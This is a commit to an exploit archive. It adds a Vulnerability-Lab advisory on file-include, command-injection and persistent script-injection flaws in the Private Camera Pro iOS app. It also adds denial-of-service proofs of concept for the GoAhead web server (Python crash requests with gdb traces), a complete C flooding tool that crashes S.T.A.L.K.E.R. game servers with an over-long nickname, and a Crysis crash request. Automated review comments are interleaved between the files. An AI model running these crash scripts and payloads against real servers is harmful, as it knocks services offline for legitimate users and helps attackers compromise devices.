Updated 02_28_2014

This commit is contained in:
Offensive Security 2014-02-28 04:28:49 +00:00
parent 8333e34e85
commit 0007ea1915
36 changed files with 2115 additions and 551 deletions

1137
files.csv

File diff suppressed because it is too large

@ -0,0 +1,323 @@
Document Title:
===============
Private Camera Pro v5.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1216
Release Date:
=============
2014-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1216
Common Vulnerability Scoring System:
====================================
8.1
Product & Service Introduction:
===============================
Private Camera is an iPhone and iPad camera app that could protect your privacy. It supports taking photos and recording videos, password
lock protect, Fake password guest mode, share photos anytime and anywhere. Take photos and videos quick and easily. Support autofocus,
tap to focus, flash light switch, camera switch, brand new UI, easy to use. Support taking still photo and recording video. Switch the
video and photo mode one click. Create, rename, delete album, set album cover. Add photos to Album, remove photos from Album. Multiple photos
can be handled at a time, you can import photos from system camera roll, export photos to system camera roll, add photos to album, remove photos
from album, delete multiple photos. Wi-Fi web access for photos upload, you can upload many photos from computer to iPhone or iPad in one shot.
With iOS 5, Private Camera can sync all your photos and videos on your iCloud account, you can access these photos & videos on all your iOS
devices, use and share these photos & videos anytime, everywhere. Protect photos and videos that you dont want to share. User requires enter
password when access the photos/videos library. Share photos and videos on Twitter, Facebook, Email with your friends.
With Password-lock functionality, can protect your personal photos and videos. Its unique Pseudo-password(decoy-password) guest mode,
can cope with annoying friends from seeing your private photos and videos. With easy to use camera features, let you using iPhone or
iPad take photos & videos and enjoy your photography life!
( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-photo-vault/id477970594 )
( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-pro-photo-vault/id473538611 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Private Camera Pro v5.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Private Camera Pro - iOS Web Application 5.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the web-application/device.
The vulnerability is located in the upload module of the mobile web-application web-interface. Remote attackers can
manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application
or connected device components. The issue allows remote attackers to include local app path values or wifi web-server files.
The exploitation appears on the application-side and the inject request method is POST. The exection occurs in the main index
file dir list. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability
scoring system) count of 7.2(+)|(-)7.3.
Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account.
Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise
or web-server compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload (UI) & Import (Device Sync)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] File Dir Index Listing
1.2
A local command/path injection web vulnerabilities has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `[devicename] (srvName)` value of the device-info module. Local attackers are able to inject own malicious
system specific commands or path value requests as the physical iOS hardware devicename. The execution of the injected command or path request occurs with
persistent attack vector in the device-info listing module of the web interface. The security risk of the local command/path inject vulnerability is estimated
as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Content > header-title
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
1.3
A persistent input validation vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application.
A persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side
of the affected application web-server.
The vulnerability is located in the add `New Album` input field. The vulnerability allows remote attackers to inject
own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs
in the index `Albums Index` listing with the vulnerable album_title parameter. The inject can be done local by the device
via add album sync function or remote by an inject via upload in the web-interface. The attack vector is persistent and
the injection request method is POST. The security risk of the persistent input validation web vulnerability in the
albumtitle value is estimated as high(-) with a cvss (common vulnerability scoring system) count of 4.2(+)|(-)4.3.
Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction
and no privileged web-interface user account. Only the sync add album sync function of the reproduce via device requires
physical access.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Albums Add (UI) & Import (Snyc Device)
Vulnerable Module(s):
[+] album_title
Affected Module(s):
[+] Album Index & Sub Category Index
Proof of Concept (PoC):
=======================
1.1
the local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Albums
<div class="btn btn-mini directDownload" title="Download photo">Download</div></div></li><li class="span2 thumbnail_warp">
<div class="thumbnail_image"><a href="http://192.168.2.109/origins/PC_20140223160359211.jpg" class="thumbnail" w="480" h="320"
t="0" u="PC_20140223160359211.jpg"><img style="display: block;" src="Default%20Album_filename-Dateien/PC_20140223160359211.jpg"
data-original="/photos/thumbnails/PC_20140223160359211.jpg" class="photo_image"><div class="inner_icons"> </div></a>
<div class="thumbnail_overlay"><img style="display: none;" src="Default%20Album_filename-Dateien/zoomout_icon.png"
class="zoomout_icon" title="origin photo"></div></div><div style="display: none;" class="photo-edit-bar"><label class="checkbox inline">15<input
id="15" name="0" value="./[LOCAL FILE INCLUDE VULNERABILITY!].jpg" type="checkbox"></label><div class="btn btn-mini directDownload"
title="Download photo">Download</div></div></li></ul></div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/asset/addAsset Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[462] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[24791]
Content-Type[multipart/form-data; boundary=---------------------------27557158176485]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------27557158176485
Content-Disposition: form-data; name="params"
name:Default%20Album|url:82A29591-4E94-4313-B4A6-B527A1A551AE|id:SYS_ALBUM_DEFAULT
-----------------------------27557158176485
Content-Disposition: form-data; name="files[]"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/jpeg
1.2
The local command inject web vulnerability can be exploited by remote attackers with physical device access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Device Info > device_info_list > srvname > device-info > [devicename] (srvName)
<div aria-hidden="false" style="display: block;" id="modal_serverInfo" class="modal hide fade in">
<div class="modal-header">
<a class="close" data-dismiss="modal">×</a>
<h4>Device info</h4>
</div>
<div class="modal-body">
<ul class="device_info_list">
<li>Name:<span id="srvName" class="device-info">bkm337¥"><%20"./[LOCAL COMMAND INJECT VULNERABILITY!]"><if></span></li>
<li>Model:<span id="srvModel" class="device-info">iPad 4 (WiFi)</span></li>
<li>iOS Version:<span id="srvVer" class="device-info">7.0.6</span></li>
<li>Free Space:<span id="srvFree" class="device-info">9.993 GB</span></li>
<li>Support Video:<span id="srvSupported" class="device-info">MOV, M4V, MP4</span></li>
</ul>
</div>
<div class="modal-footer">
<a href="#" class="btn" data-dismiss="modal">Close</a>
</div>
</div>
Note: Inject your payload as iOS devicename (phone or ipad). The execution occurs in the device-info section of the web-interface.
1.2
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and
low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: File Dir Index > album_title
<div class="span12 content-body index_page" id="indexDropbox"><ul class="thumbnails" id="albums"><li class="album_warp">
<a href="#" n="Default%20Album" u="SYS_ALBUM_DEFAULT" albumtype="1" editable="true" class="thumbnail thumbnailAlbum">
<img src="Albums_foldername-Dateien/SYS_ALBUM_DEFAULT.jpg" class="album_image"><h5 class="album_title">Default Album</h5>
<p class="album_desc 1">15 Photos</p></a></li><li class="album_warp"><a href="#" n="%20">[PERSISTENT INJECTED SCRIPT CODE!]"
u="E2569E17-2254-46D9-992C-82833B92F535" albumtype="0" editable="true" class="thumbnail thumbnailAlbum">
<img src="Albums_foldername-Dateien/E2569E17-2254-46D9-992C-82833B92F535.jpg" class="album_image">
<h5 class="album_title">><%20">[PERSISTENT INJECTED SCRIPT CODE!]"> "><%20">[PERSISTENT INJECTED SCRIPT CODE!]></h5>
<p class="album_desc 0">7 Photos</p></a></li></iframe></h5></a></li></ul></div>
Note: Use the sync function when processing to import to inject the persistent code to the file dir index of the web-interface.
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and validation of the filename value in the upload file POst method request.
1.2
The local command inject web vulnerability can be fixed by a secure encode of the vulnerable devicename value in the service information module.
1.3
The persistent input validation web vulnerability can be patched by a secure parse and encode of the vulnerable albumname value.
Restrict the albumname add and rename function to prevent further persistent script code injects via POST method request.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the local command inject web vulnerability is estimated as high(-).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
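Review bot: the section bookkeeping in 1.3 is inconsistent with the other two issues; the second "Vulnerable Module(s):" heading (the one above "[+] album_title") should read "Vulnerable Parameter(s):", and the third PoC is numbered "1.2" a second time instead of "1.3". The severity figures also disagree with one another: the header gives a CVSS of 8.1, the Technical Details paragraphs give 7.2, 6.5 and 4.2, and "Security Risk" rates 1.3 as medium(+) while its Technical Details paragraph calls it high(-); one score per issue, used consistently, would let readers prioritise. On substance, the 1.1 evidence (a `./`-prefixed multipart `filename` echoed back into the album listing) shows an unsanitised filename reaching the file list rather than inclusion of a file, so "local file include" overstates what the session log demonstrates. The fix text for 1.1 ("POst" should be "POST") would be more actionable if it named the check: reject any `filename` containing path separators or `..` components and store uploads under a server-generated name; the 1.2 and 1.3 fixes likewise should say "HTML-encode on output" rather than "secure encode", since the injected device name and album title are rendered into `<span>` and `<h5>` text.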

148
platforms/linux/dos/31761.txt Executable file


@ -0,0 +1,148 @@
# Title: Embedthis Goahead Webserver multiple DoS vulnerabilities.
# Author: 0in (Maksymilian Motyl)
# Date: 18.02.2014
# Version: 3.1.3-0
# Software Link: http://embedthis.com/products/goahead/
# Download: https://github.com/embedthis/goahead
# Tested on: Linux x32
# Description:
# "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition,
# military applications and WIFI gateways."
# .... Ok.
# But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html
-----------------------------------------------
1st vulnerability
***************************************
#!/usr/bin/python
packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"User-Agent: BillyExploiter\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive"
***************************************
Program received signal SIGABRT, Aborted.
0xb7772424 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7772424 in __kernel_vsyscall ()
#1 0xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2 0xb7580d72 in *__GI_abort () at abort.c:92
#3 0xb75b9e15 in __libc_message (do_abort=2,
fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n")
at ../sysdeps/unix/sysv/linux/libc_fatal.c:189
#4 0xb75c3f01 in malloc_printerr (action=<optimized out>,
str=0x6 <Address 0x6 out of bounds>, ptr=0xb7765dad) at malloc.c:6283
#5 0xb75c517e in munmap_chunk (p=<optimized out>) at malloc.c:3540
#6 0xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1)
at src/http.c:457
#7 0xb775309c in reuseConn (wp=0x8573240) at src/http.c:520
#8 complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575
#9 0xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837
#10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797
#11 socketEvent (wptr=0x8573240, mask=2, sid=<optimized out>) at src/http.c:735
*** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad ***
(gdb) x/xw 0xb7765dad
0xb7765dad: 0x74746800 # "tth"
-----------------------------------------------
2nd vulnerability
***************************************
#!/usr/bin/python
packet="GET http:// HTTP/1.1\r\n"
# Same crash happens when:
packet="GET http://dupa: HTTP/1.1\r\n"
***************************************
Program received signal SIGSEGV, Segmentation fault.
websDecodeUrl (decoded=decoded@entry=0xb7756253 "/",
input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
at src/http.c:2225
warning: Source file is more recent than executable.
2225 *op = *ip;
(gdb) bt
#0 websDecodeUrl (decoded=decoded@entry=0xb7756253 "/",
input=input@entry=0xb7756253 "/", len=<optimized out>, len@entry=-1)
at src/http.c:2225
#1 0xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://",
pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0,
phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c,
ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10,
preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04)
at src/http.c:3122
#2 0xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949
#3 parseIncoming (wp=0x83bf240) at src/http.c:870
(gdb) disas $eip
0xb773fb28 <+72>: cmp $0x25,%dl
0xb773fb2b <+75>: je 0xb773fb70 <websDecodeUrl+144>
=> 0xb773fb2d <+77>: mov %dl,(%esi)
(gdb) info reg
eax 0x1 1
ecx 0x13 19
edx 0x2f 47
ebx 0xb775e91c -1217009380
esp 0xbfe6cd20 0xbfe6cd20
ebp 0xb7756254 0xb7756254
esi 0xb7756253 -1217043885
edi 0xb7756253 -1217043885
eip 0xb773fb2d 0xb773fb2d <websDecodeUrl+77>
(gdb) x/xw 0xb7756253
0xb7756253: 0x7473002f
-----------------------------------------------
3rd vulnerability
***************************************
#!/usr/bin/python
packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Accept: text/html\r\n"\
"Accept-Language: pl\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"Connection: keep-alive\r\n"
"Authorization: Basic #\r\n"
***************************************
(gdb) bt
#0 strchr () at ../sysdeps/i386/strchr.S:127
#1 0xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717
#2 0xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110
#3 0xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85
(gdb) disas $eip
0xb758799a <+90>: lea 0x0(%esi),%esi
0xb75879a0 <+96>: add $0x10,%eax
=> 0xb75879a3 <+99>: mov (%eax),%ecx
(gdb) info reg
eax 0x0 0
ecx 0x3a3a 14906
edx 0x3a3a3a3a 976894522
ebx 0xb772a91c -1217222372
esp 0xbfc71428 0xbfc71428
ebp 0x8055240 0x8055240
esi 0x8055240 134566464
edi 0x0 0
eip 0xb75879a3 0xb75879a3 <strchr+99>
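Review bot: the third PoC string is broken by a missing line continuation: the line `"Connection: keep-alive\r\n"` has no trailing backslash, so the following `"Authorization: Basic #\r\n"` is a separate expression statement and never becomes part of `packet`; as written the request would not carry the header that the `parseBasicDetails` backtrace (src/auth.c:717, `strchr` with `eax 0x0`, i.e. a NULL dereference) depends on. The traces themselves deserve a sentence of interpretation for readers: the first crash is `munmap_chunk(): invalid pointer` in `termWebs` on a pointer that holds string data ("tth"), i.e. a free of memory that was never heap-allocated, which is a heap-handling bug and not just resource exhaustion; the second faults at `*op = *ip` in `websDecodeUrl` with `decoded` and `input` both pointing at the `"/"` literal and `len` = -1, so it appears to be a write into read-only string memory. "DoS" understates the first finding. Finally, the header says version 3.1.3-0 while the companion 31915.py says releases prior to 3.1.3 are affected and 3.2 fixes it; the two entries should agree, and a link to the upstream fix commit would let maintainers confirm which releases are patched.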

49
platforms/linux/dos/31915.py Executable file

@ -0,0 +1,49 @@
#!/usr/bin/python
'''
GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
(gdb) bt
#0 0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1 0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2 0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3 0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4 0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5 0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6 complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7 0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8 0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9 socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
import socket
import os
import sys
import struct
HOST = sys.argv[1]
PORT = int(sys.argv[2])
crash = '?'*1 + 'A' * 1000
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((HOST,PORT))
expl.send(payload)
data = expl.recv(1024)
print data
expl.close()
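Review bot: `print data` and the unguarded `sys.argv[1]`/`sys.argv[2]` make this Python 2 only and give an IndexError with no usage text when run without arguments; `os` and `struct` are imported and never used, and `send` should be `sendall`. Because the server is expected to abort on this request, `expl.recv(1024)` will usually raise a connection-reset error rather than return data, so the script's success case looks like a failure; wrapping the `recv` in a `try`/`except socket.error` and reporting "no response (server closed the connection)" would make the outcome readable. The docstring's "prior to 3.1.3" disagrees with 31761.txt, whose traces are from 3.1.3-0, and "A fix exists for version 3.2" should cite the upstream commit or release note alongside the linked issue #77 so the affected range is verifiable.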

351
platforms/multiple/dos/31919.c Executable file

@ -0,0 +1,351 @@
source: http://www.securityfocus.com/bid/29723/info
S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define BUFFSZ 1472
#define PORT 5445
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putcc(u8 *dst, int chr, int len);
int putws(u8 *dst, u8 *src);
int fgetz(FILE *fd, u8 *data, int size);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u32 res,
seed;
int sd,
i,
len,
pwdlen,
nicklen,
pck;
u16 port = PORT;
u8 buff[BUFFSZ],
nick[300], // major than 64
pwd[64] = "",
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"S.T.A.L.K.E.R. <= 1.0006 Denial of Service "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
seed = time(NULL);
do {
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
seed = (seed * 0x343FD) + 0x269EC3;
for(pck = 0; pck <= 4; pck++) {
p = buff;
switch(pck) {
case 0: {
*p++ = 0x88;
*p++ = 0x01;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, 0x00010006, 32); // not verified
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 1: {
*p++ = 0x80;
*p++ = 0x02;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, 0x00010006, 32); // not verified
p += putxx(p, seed, 32);
p += putxx(p, seed, 32); // should be a different number
break;
}
case 2: {
*p++ = 0x3f;
*p++ = 0x02;
*p++ = 0x00;
*p++ = 0x00;
p += putxx(p, seed, 32);
break;
}
case 3: {
memset(nick, &#039;A&#039;, sizeof(nick));
nick[sizeof(nick) - 1] = 0;
*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x01;
*p++ = 0x00;
p += putxx(p, 0x000000c1, 32);
p += putxx(p, 0x00000002, 32);
p += putxx(p, 0x00000007, 32);
p += putcc(p, 0, 0x50);// hash at 0x48 set to zeroes
pwdlen = putws(p, pwd); p += pwdlen;
p += putcc(p, 0, 4); // don&#039;t know
strncpy(p, nick, 0x80); p += 0x80;
p += putxx(p, 1, 32);
nicklen = putws(p, nick); p += nicklen;
putxx(buff + 0x10, 0xe0 + pwdlen, 32);
putxx(buff + 0x14, nicklen, 32);
putxx(buff + 0x18, 0x58 + pwdlen, 32);
if(pwd[0]) putxx(buff + 0x20, 0x58, 32);
putxx(buff + 0x24, pwdlen, 32);
break;
}
case 4: {
*p++ = 0x7f;
*p++ = 0x00;
*p++ = 0x02;
*p++ = 0x02;
p += putxx(p, 0x000000c3, 32);
break;
}
default: break;
}
len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
if(pck == 3) {
while(buff[0] != 0x7f) {
len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
}
getxx(buff + 8, &res, 32);
if(res == 0x80158410) {
printf("\n- server is protected by password, insert it: ");
fgetz(stdin, pwd, sizeof(pwd));
break;
} else if(res == 0x80158610) {
printf("\n server full ");
for(i = 5; i; i--) {
printf("%d\b", i);
sleep(ONESEC);
}
break;
} else if(res == 0x80158260) {
printf("\nError: your IP is banned\n");
exit(1);
} else if(res) {
printf("\nError: unknown error number (0x%08x)\n", res);
//exit(1);
}
}
}
close(sd);
} while(pck <= 4);
printf("\n- done\n");
return(0);
}
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
int retry = 2,
len;
if(in) {
while(retry--) {
fputc(&#039;.&#039;, stdout);
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
< 0) goto quit;
if(!out) return(0);
if(!timeout(sd, 1)) break;
}
} else {
if(timeout(sd, 3) < 0) retry = -1;
}
if(retry < 0) {
if(!err) return(-1);
printf("\nError: socket timeout, no reply received\n\n");
exit(1);
}
fputc(&#039;.&#039;, stdout);
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) goto quit;
return(len);
quit:
if(err) std_err();
return(-1);
}
int putcc(u8 *dst, int chr, int len) {
memset(dst, chr, len);
return(len);
}
int putws(u8 *dst, u8 *src) {
u8 *d,
*s;
if(!src[0]) return(0); // as required by stalker
for(s = src, d = dst; ; s++) {
*d++ = *s;
*d++ = 0;
if(!*s) break;
}
return(d - dst);
}
int fgetz(FILE *fd, u8 *data, int size) {
u8 *p;
if(!fgets(data, size, fd)) return(-1);
for(p = data; *p && (*p != &#039;\n&#039;) && (*p != &#039;\r&#039;); p++);
*p = 0;
return(p - data);
}
int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;
bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << (i << 3));
}
*ret = num;
return(bytes);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
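Review bot: the file does not compile as committed: the three `source:` / description lines at the top sit outside the `/* ... */` comment and are not valid C, so they need to be moved inside the comment block. As rendered, every character literal appears as `&#039;A&#039;`, `&#039;.&#039;`, `&#039;\n&#039;` and `&#039;\r&#039;` (the HTML entity for a single quote); the committed file should be checked to contain real `'` characters. The Windows build includes `winerr.h`, which is not part of this commit, and `std_err()` is only defined under `#ifndef WIN32`, so on WIN32 the link depends on that missing header. The `u8 *` buffers passed to `strncpy`, `fgets` and `fgetz` (which take `char *`) will produce pointer-sign warnings, and `timeout()` uses `select`/`fd_set` without `<sys/select.h>`. The comments "not verified" and "should be a different number" on the seed fields, and the 300-byte `nick` buffer copied with a fixed `strncpy(p, nick, 0x80)` and no terminator, are the actual trigger described by the summary (an over-long nickname); a one-line comment at `case 3` saying so would keep a future maintainer from "fixing" it into a non-reproducing test case.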


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29759/info
Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.
Crysis 1.21 is vulnerable; other versions may also be affected.
GET / HTTP/1.0
Content-Length: 0
